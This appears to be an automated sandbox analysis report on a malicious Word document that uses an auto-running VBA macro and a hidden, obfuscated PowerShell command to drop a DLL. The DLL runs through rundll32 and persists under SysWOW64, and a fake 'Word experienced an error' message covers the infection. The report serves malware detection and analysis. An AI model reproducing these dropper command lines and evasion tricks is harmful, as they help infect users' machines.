                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                      Document contains an embedded VBA with base64 encoded strings
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
                      Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                      Very long command line found
                      Source: unknown | Process created: Commandline size = 5293
                      Source: unknown | Process created: Commandline size = 5197
                      Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5197
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Vpdqbmffwwlyu\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002196CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00225D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00215B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00218F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00216754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002169A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002117AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002273AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002261B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00216D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002231E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00223FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002267E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002271EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00402C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004102C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004142DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00413895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00414B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00407B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00408736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004163C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00415A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00417A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00402A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00404A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00409A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004120C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004096CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00418ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004112E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004088E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004126F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00401CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00401280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004062A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004060B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004080BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004048BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00419B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00412349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00418F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00406754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00410B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00411773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00408F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00405B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00417D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00410F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00412B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00415D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00418D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00417F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00410D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00409FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00411BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004131E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00413FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004167E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004171EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00419586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0041878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00407998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00406D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004069A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004017AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004173AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00416DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004161B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002ABB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002ABB3A
                      Source: bestand-8881014518 00944.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module Wm_t404p8v_, Function Document_open
                      Source: bestand-8881014518 00944.doc | OLE indicator, VBA macros: true
                      Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: O_5Z.dll.5.dr | Static PE information: Section: .rsrc ZLIB complexity 0.994955920298
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@34/8@1/1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$stand-8881014518 00944.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCE75.tmp
                      Source: bestand-8881014518 00944.doc | OLE indicator, Word Document stream: true
                      Source: bestand-8881014518 00944.doc | OLE document summary: title field not present or empty
                      Source: bestand-8881014518 00944.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: bestand-8881014518 00944.doc | Virustotal: Detection: 31%
                      Source: bestand-8881014518 00944.doc | ReversingLabs: Detection: 47%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
